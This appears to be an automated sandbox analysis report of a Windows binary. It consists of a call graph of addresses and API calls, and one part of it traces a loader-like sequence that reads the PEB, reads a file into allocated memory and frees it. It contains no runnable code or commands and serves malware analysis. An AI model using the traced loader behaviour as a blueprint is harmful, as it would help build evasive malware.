84280 44b2c1 84277->84280 84278->83698 84280->84276 84282 44b2cf 84280->84282 84281 44b20d 84283 44b211 84281->84283 84284 44b23b 84281->84284 84285 44b2dc 84282->84285 84287 414e94 __fcloseall 106 API calls 84282->84287 84286 44b21e 84283->84286 84289 414e94 __fcloseall 106 API calls 84283->84289 84308 43526e 84284->84308 84285->83698 84290 44b22e 84286->84290 84292 414e94 __fcloseall 106 API calls 84286->84292 84287->84285 84289->84286 84290->83698 84291 44b242 84293 44b270 84291->84293 84294 44b248 84291->84294 84292->84290 84318 44b0af 111 API calls 84293->84318 84296 44b255 84294->84296 84297 414e94 __fcloseall 106 API calls 84294->84297 84298 44b265 84296->84298 84300 414e94 __fcloseall 106 API calls 84296->84300 84297->84296 84298->83698 84299 44b276 84319 43522c 67 API calls __getptd_noexit 84299->84319 84300->84298 84302 44b27c 84303 44b289 84302->84303 84305 414e94 __fcloseall 106 API calls 84302->84305 84304 44b299 84303->84304 84306 414e94 __fcloseall 106 API calls 84303->84306 84304->83698 84305->84303 84306->84304 84307->84281 84309 4138ba _malloc 67 API calls 84308->84309 84310 43527d 84309->84310 84311 4138ba _malloc 67 API calls 84310->84311 84312 43528d 84311->84312 84313 4138ba _malloc 67 API calls 84312->84313 84315 43529d 84313->84315 84316 4352bc 84315->84316 84320 43522c 67 API calls __getptd_noexit 84315->84320 84316->84291 84317 4352c8 84317->84291 84318->84299 84319->84302 84320->84317 84321->83578 84323 410148 SHGetDesktopFolder 84322->84323 84326 4101a3 _wcscpy 84322->84326 84324 41015a _wcscpy 84323->84324 84323->84326 84325 41018a SHGetPathFromIDListW 84324->84325 84324->84326 84325->84326 84326->83582 84327->83584 84329 40f5e0 152 API calls 84328->84329 84330 40f417 84329->84330 84331 42ca37 84330->84331 84332 40f42c 84330->84332 84333 42ca1f 84330->84333 84334 452574 140 API calls 84331->84334 84369 4037e0 139 API calls 7 library calls 84332->84369 84370 43717f 110 API calls _printf 84333->84370 84337 42ca50 84334->84337 84340 42ca76 84337->84340 84341 42ca54 84337->84341 84338 40f446 84338->83581 84339 42ca2d 84339->84331 84343 41171a 75 API calls 84340->84343 84342 434fe1 106 API calls 84341->84342 84344 42ca5e 84342->84344 84346 42cacc ctype 84343->84346 84371 43717f 110 API calls _printf 84344->84371 84348 42ccc3 84346->84348 84356 401b70 75 API calls 84346->84356 84359 445051 84346->84359 84362 402cc0 75 API calls 2 library calls 84346->84362 84363 4026a0 84346->84363 84372 44c80c 87 API calls 3 library calls 84346->84372 84373 44b408 75 API calls 84346->84373 84347 42ca6c 84347->84340 84349 413a88 __getptd_noexit 67 API calls 84348->84349 84350 42cccd 84349->84350 84351 434fe1 106 API calls 84350->84351 84352 42ccda 84351->84352 84356->84346 84360 41171a 75 API calls 84359->84360 84361 445080 _memcpy_s 84360->84361 84361->84346 84361->84361 84362->84346 84364 4026af 84363->84364 84365 40276b 84363->84365 84364->84365 84366 41171a 75 API calls 84364->84366 84367 4026ee ctype 84364->84367 84365->84346 84366->84367 84367->84365 84368 41171a 75 API calls 84367->84368 84368->84367 84369->84338 84370->84339 84371->84347 84372->84346 84373->84346 84374->83591 84375->83592 84376 3ecbfc8 84390 3ec9c18 84376->84390 84378 3ecc0a8 84393 3ecbeb8 84378->84393 84380 3ecc0d1 CreateFileW 84382 3ecc125 84380->84382 84384 3ecc120 84380->84384 84383 3ecc13c VirtualAlloc 84382->84383 84382->84384 84383->84384 84385 3ecc15a ReadFile 84383->84385 84385->84384 84386 3ecc175 84385->84386 84387 3ecaeb8 13 API calls 84386->84387 84388 3ecc1a8 84387->84388 84389 3ecc1cb ExitProcess 84388->84389 84389->84384 84396 3ecd0d8 GetPEB 84390->84396 84392 3eca2a3 84392->84378 84394 3ecbec1 Sleep 84393->84394 84395 3ecbecf 84394->84395 84397 3ecd102 84396->84397 84397->84392 84398 444343 84401 444326 84398->84401 84400 44434e WriteFile 84402 444340 84401->84402 84403 4442c7 84401->84403 84402->84400 84408 40e190 SetFilePointerEx 84403->84408 84405 4442e0 SetFilePointerEx 84409 40e190 SetFilePointerEx 84405->84409 84407 4442ff 84407->84400 84408->84405 84409->84407 84410 46d22f 84413 46d098 84410->84413 84412 46d241 84414 46d0b5 84413->84414 84415 46d115 84414->84415 84416 46d0b9 84414->84416 84468 45c216 78 API calls 84415->84468 84417 41171a 75 API calls 84416->84417 84419 46d0c0 84417->84419 84421 46d0cc 84419->84421 84461 40d940 76 API calls 84419->84461 84420 46d126 84422 46d0f8 84420->84422 84429 46d142 84420->84429 84462 453063 84421->84462 84423 4092c0 VariantClear 84422->84423 84425 46d0fd 84423->84425 84425->84412 84430 46d1c8 84429->84430 84431 46d158 84429->84431 84474 4676a3 78 API calls 84430->84474 84434 453063 111 API calls 84431->84434 84432 46d0ea 84432->84429 84435 46d0ee 84432->84435 84442 46d15e 84434->84442 84435->84422 84467 44ade5 CloseHandle ctype 84435->84467 84436 46d1ce 84475 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84436->84475 84437 46d18d 84469 467fce 82 API calls 84437->84469 84439 46d196 84470 4013a0 75 API calls 84439->84470 84442->84437 84442->84439 84444 46d1e7 84447 4092c0 VariantClear 84444->84447 84455 46d194 84444->84455 84445 46d1a2 84471 40df50 75 API calls 84445->84471 84447->84455 84448 46d1ac 84472 40d3b0 75 API calls 2 library calls 84448->84472 84450 46d224 84450->84412 84451 46d1b8 84473 467fce 82 API calls 84451->84473 84454 46d216 84476 44ade5 CloseHandle ctype 84454->84476 84455->84450 84457 40d900 84455->84457 84458 40d917 84457->84458 84459 40d909 84457->84459 84458->84459 84460 40d91c CloseHandle 84458->84460 84459->84454 84460->84454 84461->84421 84463 45306e 84462->84463 84464 45307a 84462->84464 84463->84464 84477 452e2a 111 API calls 5 library calls 84463->84477 84466 40dfa0 83 API calls 84464->84466 84466->84432 84467->84422 84468->84420 84469->84455 84470->84445 84471->84448 84472->84451 84473->84455 84474->84436 84475->84444 84476->84450 84477->84464 84478 40116e 84479 401119 DefWindowProcW 84478->84479 84480 40f110 RegOpenKeyExW 84481 40f13c RegQueryValueExW RegCloseKey 84480->84481 84482 40f15f 84480->84482 84481->84482 84483 429212 84488 410b90 84483->84488 84486 411421 __cinit 74 API calls 84487 42922f 84486->84487 84489 410b9a __write_nolock 84488->84489 84490 41171a 75 API calls 84489->84490 84491 410c31 GetModuleFileNameW 84490->84491 84505 413db0 84491->84505 84493 410c66 _wcsncat 84508 413e3c 84493->84508 84496 41171a 75 API calls 84497 410ca3 _wcscpy 84496->84497 84498 410cd1 RegOpenKeyExW 84497->84498 84499 429bc3 RegQueryValueExW 84498->84499 84500 410cf7 84498->84500 84501 429cd9 RegCloseKey 84499->84501 84503 429bf2 _wcscat _wcslen _wcsncpy 84499->84503 84500->84486 84502 41171a 75 API calls 84502->84503 84503->84502 84504 429cd8 84503->84504 84504->84501 84511 413b95 84505->84511 84541 41abec 84508->84541 84518 413bae 84511->84518 84523 413c2f 84511->84523 84512 413d60 84537 417f23 67 API calls __getptd_noexit 84512->84537 84513 413d7b 84539 417f23 67 API calls __getptd_noexit 84513->84539 84516 413d65 84521 413cfb 84516->84521 84538 417ebb 6 API calls 2 library calls 84516->84538 84518->84523 84527 413c1d 84518->84527 84533 41ab19 67 API calls _memcpy_s 84518->84533 84520 413d03 84520->84521 84520->84523 84524 413d8e 84520->84524 84521->84493 84522 413cb9 84522->84523 84525 413cd6 84522->84525 84535 41ab19 67 API calls _memcpy_s 84522->84535 84523->84512 84523->84513 84540 41ab19 67 API calls _memcpy_s 84524->84540 84525->84521 84525->84523 84529 413cef 84525->84529 84527->84523 84532 413c9b 84527->84532 84534 41ab19 67 API calls _memcpy_s 84527->84534 84536 41ab19 67 API calls _memcpy_s 84529->84536 84532->84520 84532->84522 84533->84527 84534->84532 84535->84525 84536->84521 84537->84516 84539->84516 84540->84521 84542 41ac02 84541->84542 84543 41abfd 84541->84543 84550 417f23 67 API calls __getptd_noexit 84542->84550 84543->84542 84549 41ac22 84543->84549 84545 41ac07 84551 417ebb 6 API calls 2 library calls 84545->84551 84548 410c99 84548->84496 84549->84548 84552 417f23 67 API calls __getptd_noexit 84549->84552 84550->84545 84552->84545 84553 401230 84554 401241 _memset 84553->84554 84555 4012c5 84553->84555 84568 401be0 84554->84568 84557 40126b 84558 4012ae KillTimer SetTimer 84557->84558 84559 42aa61 84557->84559 84560 401298 84557->84560 84558->84555 84563 42aa8b Shell_NotifyIconW 84559->84563 84564 42aa69 Shell_NotifyIconW 84559->84564 84561 4012a2 84560->84561 84562 42aaac 84560->84562 84561->84558 84565 42aaf8 Shell_NotifyIconW 84561->84565 84566 42aad7 Shell_NotifyIconW 84562->84566 84567 42aab5 Shell_NotifyIconW 84562->84567 84563->84558 84564->84558 84565->84558 84566->84558 84567->84558 84569 401bfb 84568->84569 84589 401cde 84568->84589 84590 4013a0 75 API calls 84569->84590 84571 401c0b 84572 42a9a0 LoadStringW 84571->84572 84573 401c18 84571->84573 84575 42a9bb 84572->84575 84591 4021e0 84573->84591 84604 40df50 75 API calls 84575->84604 84576 401c2d 84578 401c3a 84576->84578 84579 42a9cd 84576->84579 84578->84575 84580 401c44 84578->84580 84605 40d3b0 75 API calls 2 library calls 84579->84605 84603 40d3b0 75 API calls 2 library calls 84580->84603 84583 42a9dc 84584 42a9f0 84583->84584 84586 401c53 _memset _wcscpy _wcsncpy 84583->84586 84606 40d3b0 75 API calls 2 library calls 84584->84606 84588 401cc2 Shell_NotifyIconW 84586->84588 84587 42a9fe 84588->84589 84589->84557 84590->84571 84592 42a598 84591->84592 84595 4021f1 _wcslen 84591->84595 84609 40c740 84592->84609 84594 42a5a2 84596 402205 84595->84596 84597 402226 84595->84597 84607 404020 75 API calls ctype 84596->84607 84608 401380 75 API calls 84597->84608 84600 40220c _memcpy_s 84600->84576 84601 40222d 84601->84594 84602 41171a 75 API calls 84601->84602 84602->84600 84603->84586 84604->84586 84605->84583 84606->84587 84607->84600 84608->84601 84610 40c752 84609->84610 84611 40c747 84609->84611 84610->84594 84611->84610 84614 402ae0 75 API calls _memcpy_s 84611->84614 84613 42a572 _memcpy_s 84613->84594 84614->84613 84615 4034b0 84616 4034b9 84615->84616 84617 4034bd 84615->84617 84618 41171a 75 API calls 84617->84618 84619 42a0ba 84617->84619 84620 4034fe _memcpy_s ctype 84618->84620 84621 431914 84622 431920 84621->84622 84623 431928 84622->84623 84624 43193d 84622->84624 84885 45e62e 116 API calls 3 library calls 84623->84885 84886 47f2b4 174 API calls 84624->84886 84627 43194a 84664 4095b0 ctype 84627->84664 84887 45e62e 116 API calls 3 library calls 84627->84887 84629 409708 84630 4097af 84630->84629 84872 40d590 VariantClear 84630->84872 84633 4315b8 WaitForSingleObject 84635 4315d6 GetExitCodeProcess CloseHandle 84633->84635 84633->84664 84876 40d590 VariantClear 84635->84876 84636 431623 Sleep 84639 43163b timeGetTime 84636->84639 84657 409894 84636->84657 84639->84657 84642 40986e Sleep 84644 409880 timeGetTime 84642->84644 84642->84657 84643 4098f1 TranslateMessage DispatchMessageW 84643->84664 84644->84657 84645 431673 CloseHandle 84645->84657 84646 43170c GetExitCodeProcess CloseHandle 84646->84657 84647 40d590 VariantClear 84647->84657 84649 46dd22 133 API calls 84649->84657 84651 46e641 134 API calls 84651->84657 84652 431781 Sleep 84652->84664 84657->84645 84657->84646 84657->84647 84657->84649 84657->84651 84657->84652 84662 4092c0 VariantClear 84657->84662 84657->84664 84873 447e59 75 API calls 84657->84873 84874 453b07 77 API calls 84657->84874 84875 4646a2 76 API calls 84657->84875 84877 444233 88 API calls _wcslen 84657->84877 84878 457509 VariantClear 84657->84878 84879 404120 84657->84879 84883 4717e3 VariantClear 84657->84883 84884 436272 6 API calls 84657->84884 84661 4319c9 VariantClear 84661->84664 84662->84657 84663 4092c0 VariantClear 84663->84664 84664->84629 84664->84630 84664->84633 84664->84636 84664->84642 84664->84643 84664->84657 84664->84661 84664->84663 84665 45e62e 116 API calls 84664->84665 84667 40b380 84664->84667 84691 409340 84664->84691 84724 409030 84664->84724 84738 40d300 84664->84738 84743 40d320 84664->84743 84749 409a40 84664->84749 84888 40e380 VariantClear ctype 84664->84888 84665->84664 84668 40b3a5 84667->84668 84669 40b53d 84667->84669 84670 430a99 84668->84670 84676 40b3b6 84668->84676 84889 45e62e 116 API calls 3 library calls 84669->84889 84890 45e62e 116 API calls 3 library calls 84670->84890 84673 40b528 84673->84664 84674 430aae 84678 4092c0 VariantClear 84674->84678 84676->84674 84679 40b3f2 84676->84679 84690 40b4fd ctype 84676->84690 84677 430dc9 84677->84677 84678->84673 84680 40b429 84679->84680 84681 430ae9 VariantClear 84679->84681 84688 40b476 ctype 84679->84688 84683 40b43b ctype 84680->84683 84891 40e380 VariantClear ctype 84680->84891 84681->84683 84682 430d41 VariantClear 84682->84690 84686 41171a 75 API calls 84683->84686 84683->84688 84685 40b4eb 84685->84690 84892 40e380 VariantClear ctype 84685->84892 84686->84688 84688->84685 84689 430d08 ctype 84688->84689 84689->84682 84689->84690 84690->84673 84893 45e62e 116 API calls 3 library calls 84690->84893 84692 409386 84691->84692 84696 409395 84691->84696 84894 4042f0 75 API calls __cinit 84692->84894 84695 42fba9 84898 45e62e 116 API calls 3 library calls 84695->84898 84696->84695 84698 409484 ctype 84696->84698 84699 42fc07 84696->84699 84701 42fc85 84696->84701 84703 42fcd8 84696->84703 84705 42fd4f 84696->84705 84709 42fd39 84696->84709 84712 40946f 84696->84712 84716 40947b 84696->84716 84718 4094c1 84696->84718 84720 4092c0 VariantClear 84696->84720 84897 453155 75 API calls 84696->84897 84899 40c620 118 API calls 84696->84899 84901 45e62e 116 API calls 3 library calls 84696->84901 84698->84664 84900 45e62e 116 API calls 3 library calls 84699->84900 84902 4781ae 140 API calls 84701->84902 84904 47f2b4 174 API calls 84703->84904 84707 4092c0 VariantClear 84705->84707 84707->84698 84708 42fc9c 84708->84698 84903 45e62e 116 API calls 3 library calls 84708->84903 84906 45e62e 116 API calls 3 library calls 84709->84906 84711 42fce9 84711->84698 84905 45e62e 116 API calls 3 library calls 84711->84905 84895 409210 VariantClear 84712->84895 84719 4092c0 VariantClear 84716->84719 84718->84698 84896 404260 76 API calls 84718->84896 84719->84698 84720->84696 84722 4094e1 84723 4092c0 VariantClear 84722->84723 84723->84698 84907 409110 117 API calls 84724->84907 84726 42ceb6 84917 410ae0 VariantClear ctype 84726->84917 84728 42cebf 84729 40906e 84729->84726 84730 42cea9 84729->84730 84732 4090a4 84729->84732 84916 45e62e 116 API calls 3 library calls 84730->84916 84908 404160 84732->84908 84735 4090f0 ctype 84735->84664 84736 4092c0 VariantClear 84737 4090be ctype 84736->84737 84737->84735 84737->84736 84739 4292e3 84738->84739 84740 40d30c 84738->84740 84741 429323 84739->84741 84742 4292fd TranslateAcceleratorW 84739->84742 84740->84664 84741->84664 84742->84740 84744 4296d0 84743->84744 84745 40d32f 84743->84745 84744->84664 84746 42972a IsDialogMessageW 84745->84746 84747 40d33c 84745->84747 85052 4340ec GetClassLongW 84745->85052 84746->84745 84746->84747 84747->84664 84750 409a66 _wcslen 84749->84750 84751 41171a 75 API calls 84750->84751 84812 40aade _memcpy_s ctype 84750->84812 84752 409a9c _memcpy_s 84751->84752 84754 41171a 75 API calls 84752->84754 84756 409abd 84754->84756 84755 42cee9 84757 41171a 75 API calls 84755->84757 84758 409aeb CharUpperBuffW 84756->84758 84760 409b09 ctype 84756->84760 84756->84812 84797 42cf10 _memcpy_s 84757->84797 84758->84760 84802 409b88 ctype 84760->84802 85055 47d10e 150 API calls 84760->85055 84762 4092c0 VariantClear 84763 42e5e0 84762->84763 85087 410ae0 VariantClear ctype 84763->85087 84765 42e5f2 84766 409e4a 84768 41171a 75 API calls 84766->84768 84773 409ea4 84766->84773 84766->84797 84767 40aa5b 84770 41171a 75 API calls 84767->84770 84768->84773 84769 41171a 75 API calls 84769->84802 84787 40aa81 _memcpy_s ctype 84770->84787 84771 409ed0 84775 42d50d 84771->84775 84833 409ef8 _memcpy_s ctype 84771->84833 85065 40b800 VariantClear VariantClear ctype 84771->85065 84773->84771 84774 41171a 75 API calls 84773->84774 84776 42d480 84774->84776 84781 42d527 84775->84781 85066 40b800 VariantClear VariantClear ctype 84775->85066 84780 42d491 84776->84780 85061 44b3f6 75 API calls 84776->85061 84777 42d195 VariantClear 84777->84802 84778 40a3a7 84785 40a415 84778->84785 84832 42db5c 84778->84832 85062 40df50 75 API calls 84780->85062 84781->84833 85067 40e2e0 VariantClear ctype 84781->85067 84782 4092c0 VariantClear 84782->84802 84789 41171a 75 API calls 84785->84789 84795 41171a 75 API calls 84787->84795 84804 40a41c 84789->84804 84793 42db96 85073 45e62e 116 API calls 3 library calls 84793->85073 84795->84812 84796 42d4a6 85063 4530b3 75 API calls 84796->85063 85086 45e62e 116 API calls 3 library calls 84797->85086 84799 42d128 84801 4092c0 VariantClear 84799->84801 84800 42d4d7 85064 4530b3 75 API calls 84800->85064 84806 42d131 84801->84806 84802->84766 84802->84767 84802->84769 84802->84777 84802->84782 84802->84787 84802->84797 84802->84799 84803 42d20c 84802->84803 84810 42dbb9 84802->84810 85056 40c3e0 75 API calls 84802->85056 85057 40c620 118 API calls 84802->85057 85059 40be00 75 API calls 2 library calls 84802->85059 85060 40e380 VariantClear ctype 84802->85060 84803->84664 84817 40a481 84804->84817 85074 40c8a0 VariantClear ctype 84804->85074 85058 410ae0 VariantClear ctype 84806->85058 84810->84762 85054 401380 75 API calls 84812->85054 84813 41171a 75 API calls 84813->84833 84815 44b3f6 75 API calls 84815->84833 84816 4092c0 VariantClear 84846 40a534 _memcpy_s ctype 84816->84846 84818 40a4ed 84817->84818 84820 42dc1e VariantClear 84817->84820 84817->84846 84824 40a4ff ctype 84818->84824 85075 40e380 VariantClear ctype 84818->85075 84819 402cc0 75 API calls 84819->84833 84820->84824 84823 41171a 75 API calls 84823->84846 84824->84823 84824->84846 84828 42deb6 VariantClear 84828->84846 84829 411421 74 API calls __cinit 84829->84833 84830 40a73c 84834 42e237 84830->84834 84840 40a76b 84830->84840 84831 40e380 VariantClear 84831->84846 85072 4721e5 VariantClear 84832->85072 84833->84778 84833->84793 84833->84812 84833->84813 84833->84815 84833->84819 84833->84829 84833->84832 84839 40a053 84833->84839 85068 45ee98 75 API calls 84833->85068 85069 4019e0 76 API calls 84833->85069 85070 404260 76 API calls 84833->85070 85071 409210 VariantClear 84833->85071 85079 46e709 VariantClear VariantClear ctype 84834->85079 84835 42df47 VariantClear 84835->84846 84836 42dfe9 VariantClear 84836->84846 84838 40a7a2 84853 40a7ad ctype 84838->84853 85080 40b800 VariantClear VariantClear ctype 84838->85080 84839->84664 84840->84838 84864 40a800 ctype 84840->84864 85053 40b800 VariantClear VariantClear ctype 84840->85053 84843 40a8b0 84858 40a8c2 ctype 84843->84858 85082 40e380 VariantClear ctype 84843->85082 84844 42e312 84848 42e337 VariantClear 84844->84848 84844->84858 84845 41171a 75 API calls 84847 42dd10 VariantInit VariantCopy 84845->84847 84846->84816 84846->84828 84846->84830 84846->84831 84846->84834 84846->84835 84846->84836 84846->84845 84851 41171a 75 API calls 84846->84851 85076 46e9cd 75 API calls 84846->85076 85077 409210 VariantClear 84846->85077 85078 44cc6c VariantClear ctype 84846->85078 84847->84846 84850 42dd30 VariantClear 84847->84850 84848->84858 84849 42e3b2 84859 42e3da VariantClear 84849->84859 84865 40a91a ctype 84849->84865 84850->84846 84851->84846 84854 40a7ee 84853->84854 84857 42e2a7 VariantClear 84853->84857 84853->84864 84854->84864 85081 40e380 VariantClear ctype 84854->85081 84856 40a908 84856->84865 85083 40e380 VariantClear ctype 84856->85083 84857->84864 84858->84849 84858->84856 84859->84865 84860 42e47f 84866 42e4a3 VariantClear 84860->84866 84871 40a957 ctype 84860->84871 84862 40a945 84862->84871 85084 40e380 VariantClear ctype 84862->85084 84864->84843 84864->84844 84865->84860 84865->84862 84866->84871 84868 40aa22 ctype 84868->84664 84869 42e559 VariantClear 84869->84871 84871->84868 84871->84869 85085 40e380 VariantClear ctype 84871->85085 84872->84629 84873->84657 84874->84657 84875->84657 84876->84657 84877->84657 84878->84657 84880 40412e 84879->84880 84881 4092c0 VariantClear 84880->84881 84882 404138 84881->84882 84882->84652 84883->84657 84884->84657 84885->84664 84886->84627 84887->84664 84888->84664 84889->84670 84890->84674 84891->84683 84892->84690 84893->84677 84894->84696 84895->84716 84896->84722 84897->84696 84898->84698 84899->84696 84900->84698 84901->84696 84902->84708 84903->84698 84904->84711 84905->84698 84906->84705 84907->84729 84909 4092c0 VariantClear 84908->84909 84910 40416e 84909->84910 84911 404120 VariantClear 84910->84911 84912 40419b 84911->84912 84918 4734b7 84912->84918 84962 40efe0 84912->84962 84913 4041c6 84913->84726 84913->84737 84916->84726 84917->84728 84919 453063 111 API calls 84918->84919 84920 4734d7 84919->84920 84921 473545 84920->84921 84922 47350c 84920->84922 84970 463c42 84921->84970 84924 4092c0 VariantClear 84922->84924 84929 473514 84924->84929 84925 473558 84926 47355c 84925->84926 84942 473595 84925->84942 84927 4092c0 VariantClear 84926->84927 84937 473564 84927->84937 84928 473616 84983 463d7e 84928->84983 84929->84913 84931 473622 84933 473697 84931->84933 84934 47362c 84931->84934 84932 453063 111 API calls 84932->84942 85017 457838 84933->85017 84938 4092c0 VariantClear 84934->84938 84937->84913 84940 473634 84938->84940 84940->84913 84941 473655 84945 4092c0 VariantClear 84941->84945 84942->84928 84942->84932 84942->84941 85029 462f5a 87 API calls __wcsicoll 84942->85029 84956 47365d 84945->84956 84946 4736b0 85030 45e62e 116 API calls 3 library calls 84946->85030 84947 4736c9 85031 40e7e0 76 API calls 84947->85031 84950 4736db 84960 4736ff 84950->84960 85032 40d030 76 API calls 84950->85032 84951 4736ba GetCurrentProcess TerminateProcess 84951->84947 84953 473731 84958 473744 FreeLibrary 84953->84958 84959 47374b 84953->84959 84954 4736f1 85033 46b945 134 API calls 2 library calls 84954->85033 84956->84913 84958->84959 84959->84913 84960->84953 85034 40d030 76 API calls 84960->85034 85035 46b945 134 API calls 2 library calls 84960->85035 84963 40eff5 CreateFileW 84962->84963 84964 4299bf 84962->84964 84966 40f017 84963->84966 84965 4299c4 CreateFileW 84964->84965 84964->84966 84965->84966 84967 4299ea 84965->84967 84966->84913 85051 40e0d0 SetFilePointerEx SetFilePointerEx 84967->85051 84969 4299f5 84969->84966 85036 45335b 76 API calls 84970->85036 84972 463c5d 85037 442c52 80 API calls _wcslen 84972->85037 84974 463c72 84975 463cac 84974->84975 84977 40c060 75 API calls 84974->84977 84982 463cf7 84975->84982 85039 462f5a 87 API calls __wcsicoll 84975->85039 84978 463c8e 84977->84978 85038 4608ce 75 API calls _memcpy_s 84978->85038 84980 463ca4 84981 40c740 75 API calls 84980->84981 84981->84975 84982->84925 84984 453063 111 API calls 84983->84984 84985 463d99 84984->84985 84986 463de0 84985->84986 84987 463dca 84985->84987 85041 40c760 78 API calls 84986->85041 85040 453081 111 API calls 84987->85040 84990 463dd0 LoadLibraryW 84992 463e09 84990->84992 84991 463de7 84996 463e19 84991->84996 85042 40c760 78 API calls 84991->85042 84993 463e3e 84992->84993 84992->84996 84998 463e4e 84993->84998 84999 463e7b 84993->84999 84995 463dfb 84995->84996 85043 40c760 78 API calls 84995->85043 84996->84931 85044 40d500 75 API calls 84998->85044 85046 40c760 78 API calls 84999->85046 85002 463e82 GetProcAddress 85006 463e90 85002->85006 85003 463e57 85045 45efe7 77 API calls ctype 85003->85045 85005 463e62 GetProcAddress 85008 463e79 85005->85008 85006->84996 85007 463edf 85006->85007 85006->85008 85007->84996 85010 463eef FreeLibrary 85007->85010 85008->85006 85047 403470 75 API calls _memcpy_s 85008->85047 85010->84996 85011 463eb4 85048 40d500 75 API calls 85011->85048 85013 463ebd 85049 45efe7 77 API calls ctype 85013->85049 85015 463ec8 GetProcAddress 85050 401330 ctype 85015->85050 85018 457a4c 85017->85018 85024 45785f _strcat _wcslen _wcscpy ctype 85017->85024 85025 410d40 85018->85025 85019 443576 78 API calls 85019->85024 85020 40c760 78 API calls 85020->85024 85021 453081 111 API calls 85021->85024 85022 4138ba 67 API calls _malloc 85022->85024 85023 40f580 77 API calls 85023->85024 85024->85018 85024->85019 85024->85020 85024->85021 85024->85022 85024->85023 85027 410d55 85025->85027 85026 410ded VirtualProtect 85028 410dbb 85026->85028 85027->85026 85027->85028 85028->84946 85028->84947 85029->84942 85030->84951 85031->84950 85032->84954 85033->84960 85034->84960 85035->84960 85036->84972 85037->84974 85038->84980 85039->84982 85040->84990 85041->84991 85042->84995 85043->84992 85044->85003 85045->85005 85046->85002 85047->85011 85048->85013 85049->85015 85050->85007 85051->84969 85052->84745 85053->84838 85054->84755 85055->84760 85056->84802 85057->84802 85058->84868 85059->84802 85060->84802 85061->84780 85062->84796 85063->84800 85064->84771 85065->84775 85066->84781 85067->84833 85068->84833 85069->84833 85070->84833 85071->84833 85072->84793 85073->84810 85074->84804 85075->84824 85076->84846 85077->84846 85078->84846 85079->84838 85080->84853 85081->84864 85082->84858 85083->84865 85084->84871 85085->84871 85086->84810 85087->84765 85088 42919b 85093 40ef10 85088->85093 85091 411421 __cinit 74 API calls 85092 4291aa 85091->85092 85094 41171a 75 API calls 85093->85094 85095 40ef17 85094->85095 85096 42ad48 85095->85096 85101 40ef40 74 API calls __cinit 85095->85101 85098 40ef2a 85102 40e470 85098->85102 85101->85098 85103 40c060 75 API calls 85102->85103 85104 40e483 GetVersionExW 85103->85104 85105 4021e0 75 API calls 85104->85105 85106 40e4bb 85105->85106 85128 40e600 85106->85128 85112 42accc 85114 42ad28 GetSystemInfo 85112->85114 85117 42ad38 GetSystemInfo 85114->85117 85115 40e557 GetCurrentProcess 85148 40ee30 LoadLibraryA GetProcAddress 85115->85148 85116 40e56c 85116->85117 85141 40eee0 85116->85141 85121 40e5c9 85145 40eea0 85121->85145 85124 40e5e0 85126 40e5f1 FreeLibrary 85124->85126 85127 40e5f4 85124->85127 85125 40e5dd FreeLibrary 85125->85124 85126->85127 85127->85091 85129 40e60b 85128->85129 85130 40c740 75 API calls 85129->85130 85131 40e4c2 85130->85131 85132 40e620 85131->85132 85134 40e62a 85132->85134 85133 42ac93 85134->85133 85135 40c740 75 API calls 85134->85135 85136 40e4ce 85135->85136 85136->85112 85137 40ee70 85136->85137 85138 40e551 85137->85138 85139 40ee76 LoadLibraryA 85137->85139 85138->85115 85138->85116 85139->85138 85140 40ee87 GetProcAddress 85139->85140 85140->85138 85142 40e5bf 85141->85142 85143 40eee6 LoadLibraryA 85141->85143 85142->85114 85142->85121 85143->85142 85144 40eef7 GetProcAddress 85143->85144 85144->85142 85149 40eec0 LoadLibraryA GetProcAddress 85145->85149 85147 40e5d3 GetNativeSystemInfo 85147->85124 85147->85125 85148->85116 85149->85147 85150 42e89e 85157 40c000 85150->85157 85152 42e8ac 85153 409a40 165 API calls 85152->85153 85154 42e8ca 85153->85154 85168 44b92e VariantClear 85154->85168 85156 42f3ae 85158 40c014 85157->85158 85159 40c007 85157->85159 85161 40c01a 85158->85161 85162 40c02c 85158->85162 85169 409210 VariantClear 85159->85169 85170 409210 VariantClear 85161->85170 85163 41171a 75 API calls 85162->85163 85167 40c033 85163->85167 85164 40c00f 85164->85152 85166 40c023 85166->85152 85167->85152 85168->85156 85169->85164 85170->85166 85171 3ecc573 85172 3ecc57a 85171->85172 85173 3ecc618 85172->85173 85174 3ecc582 85172->85174 85191 3eccec8 9 API calls 85173->85191 85178 3ecc228 85174->85178 85177 3ecc5ff 85179 3ec9c18 GetPEB 85178->85179 85188 3ecc2c7 85179->85188 85181 3ecc2f8 CreateFileW 85184 3ecc305 85181->85184 85181->85188 85182 3ecc321 VirtualAlloc 85183 3ecc342 ReadFile 85182->85183 85182->85184 85183->85184 85187 3ecc360 VirtualAlloc 85183->85187 85185 3ecc514 VirtualFree 85184->85185 85186 3ecc522 85184->85186 85185->85186 85186->85177 85187->85184 85187->85188 85188->85182 85188->85184 85189 3ecc428 CloseHandle 85188->85189 85190 3ecc438 VirtualFree 85188->85190 85192 3ecd138 GetPEB 85188->85192 85189->85188 85190->85188 85191->85177 85193 3ecd162 85192->85193 85193->85181

                                                                              Executed Functions

                                                                              Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00409A61
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
